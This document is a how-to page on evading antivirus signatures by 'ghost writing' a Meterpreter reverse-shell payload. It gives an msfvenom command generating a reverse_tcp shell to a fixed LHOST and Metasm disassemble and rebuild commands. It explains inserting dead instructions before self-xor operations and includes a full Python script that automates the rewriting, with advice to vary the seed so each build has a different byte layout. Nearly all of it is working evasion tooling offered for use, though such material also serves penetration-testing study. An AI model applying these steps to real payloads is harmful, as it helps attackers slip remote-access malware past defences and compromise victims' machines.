
# Ghost Writing Binaries

* Ghost writing means editing the assembly source recovered from a binary so that the byte patterns anti-virus engines have signatures for no longer appear, while the program keeps doing exactly what it did before.
* Overview

```
Create a .exe
Convert it to .asm 
Edit the .asm file
Convert back to .exe 
```

* Most of the time you do not want to alter the functionality of the binary, only its bytes.
* Some additional things (outside of ghost writing) that can help with evading signatures are:

```
Removing the Help menu of a tool
Removing instances of the tool name in the source code
```

### Ghost Writing How To

* Generate a payload to work on, for example with `msfvenom`:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86
```

* Now that you have a raw payload, disassemble it into an editable assembly listing.
* The disassembler script shipped with Metasm is a great option for this:
* <https://github.com/jjyg/metasm>

```
ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm
```

* Now open the file in a text editor such as `gedit`

### Obfuscation of ASM File

* At the very top of the file add the Metasm directives that declare the code section and the entry point, which the PE encoder needs when the file is rebuilt:

```
.section '.text' rwx
.entrypoint
```

* Now start by finding every `xor` whose two operands are the same register.
* `xor`ing a register with itself always sets it to 0 (and sets the arithmetic flags to fixed values), so whatever the register held beforehand is thrown away.
* For example, look for something like this:

```
xor eax, eax
```

* Because this `xor` discards whatever `eax` held, any instruction that only changes `eax` (or changes nothing at all) can be placed right before it without altering behaviour.
* Thus we can add this in before the `xor` statement:

```
push eax
pop eax
xor eax, eax
```

* Feel free to add other irrelevant instructions in the same way, but only in front of a `xor` whose operands are the same register; a `xor` between two different registers depends on their old values, so nothing that changes them may be inserted there.
* `nop` instructions can also be sprinkled between instructions anywhere in the program.
* Testing is your best friend here: rebuild and run the binary after each round of edits and confirm it still behaves as before.
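The editing step above, automated as an added example (this is not code from the original notes and not part of Metasm): it scans a `disassemble.rb` listing for `xor` with identical 32-bit operands, inserts a random mix of dead instructions in front of each one, tags every inserted line so the edit can be audited or undone, and leaves 8-bit and two-register `xor`s alone. The listing `SAMPLE` is constructed to look like Metasm output; the `; ghost` tag, the function names and the `0x` immediate syntax are assumptions of this example.

```python
"""Automate the xor-site edit: insert dead instructions before `xor reg, reg`.

Added example, not part of the original notes and not a Metasm tool. It
rewrites the text listing written by metasm's disassemble.rb so that
peencode.rb reassembles a binary with the same behaviour but different
bytes. SAMPLE is constructed to resemble a Metasm listing; the offsets and
opcode bytes in its comments are illustrative and ignored on reassembly.
"""
import random
import re

# 32-bit general-purpose registers (the page builds x86 payloads).
GPR32 = ("eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp")
REG_RE = re.compile(r"\b(" + "|".join(GPR32) + r")\b")

# An instruction line of the form `xor REG, REG` with both operands identical.
SELF_XOR = re.compile(r"^(?P<indent>\s*)xor\s+(?P<reg>[a-z]+)\s*,\s*(?P=reg)\b",
                      re.IGNORECASE)

TAG = "; ghost"  # every inserted line carries this so it can be audited or undone

SAMPLE = """\
.section '.text' rwx
.entrypoint
entrypoint_0:
    cld                                     ; @0 fc
    call loc_88h                            ; @1 e882000000
loc_6h:
    pushad                                  ; @6 60
    mov ebp, esp                            ; @7 89e5
    xor eax, eax                            ; @9 31c0
    mov edx, dword ptr fs:[eax+30h]         ; @0bh 648b5030
    xor ecx, ecx                            ; @0fh 31c9
    xor al, al                              ; @11h 30c0  (8-bit: left alone)
    xor edx, ebx                            ; @13h 31da  (two registers: left alone)
    ret                                     ; @15h c3
"""


def dead_writes(reg, rng):
    """Instruction sequences that are dead immediately before `xor reg, reg`.

    Each either leaves every register as it was (nop, mov reg, reg, push/pop,
    inc/dec) or writes only `reg`, which the xor overwrites next. They may
    change arithmetic flags, but the xor then sets OF/SF/ZF/PF/CF itself, so
    no later instruction can tell the difference. Intel syntax with 0x
    immediates is assumed to be accepted by the reassembler.
    """
    imm = rng.randrange(1, 0x7FFF)
    pool = [["nop"], [f"mov {reg}, {reg}"]]
    if reg == "esp":
        return pool  # never disturb the stack pointer, even transiently
    pool += [
        [f"mov {reg}, 0x{imm:x}"],
        [f"lea {reg}, [{reg}+0x{imm:x}]"],
        [f"not {reg}"],
        [f"inc {reg}", f"dec {reg}"],
        [f"push {reg}", f"pop {reg}"],
    ]
    return pool


def ghostwrite(listing, seed=0, max_per_site=3):
    """Insert 1..max_per_site dead sequences before every 32-bit self-xor.

    Returns (rewritten listing, number of sites edited). Only full-width
    registers are handled: before `xor al, al` a write to eax is NOT dead,
    because that xor clears just the low byte.
    """
    rng = random.Random(seed)
    out, sites = [], 0
    for line in listing.splitlines():
        m = SELF_XOR.match(line)
        if m and m.group("reg").lower() in GPR32:
            sites += 1
            reg = m.group("reg").lower()
            for _ in range(rng.randint(1, max_per_site)):
                for ins in rng.choice(dead_writes(reg, rng)):
                    out.append(f"{m.group('indent')}{ins:<40}{TAG}")
        out.append(line)
    return "\n".join(out) + "\n", sites


def strip_ghost(listing):
    """Undo ghostwrite(): drop every tagged line."""
    kept = [l for l in listing.splitlines() if not l.rstrip().endswith(TAG)]
    return "\n".join(kept) + "\n"


def audit(listing):
    """Check that each run of inserted lines sits directly before a self-xor
    and names no register other than the one that xor clears."""
    pending = []
    for line in listing.splitlines():
        if line.rstrip().endswith(TAG):
            pending.append(line.lower())
            continue
        if pending:
            m = SELF_XOR.match(line)
            if not m:
                return False
            reg = m.group("reg").lower()
            if any(set(REG_RE.findall(g)) - {reg} for g in pending):
                return False
            pending = []
    return not pending


if __name__ == "__main__":
    text, sites = ghostwrite(SAMPLE, seed=7)
    print(text)
    print(f"# {sites} self-xor sites rewritten, audit ok: {audit(text)}")
```

Run it on the real listing with `ghostwrite(open('payload.asm').read(), seed=...)`, write the result back and reassemble with `peencode.rb`. Branch targets survive because the listing refers to them by label rather than by offset; the `; @addr bytes` comments go stale but are comments, so the assembler ignores them. Vary the seed between builds so each rebuilt sample has a different byte layout, and keep `audit()` in the loop so a hand edit that drifts away from a self-xor site is caught before the binary is tested.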

### Convert Back

* Once you are done altering the `asm`, it is time to convert it back to an `exe`:

```
ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe
```

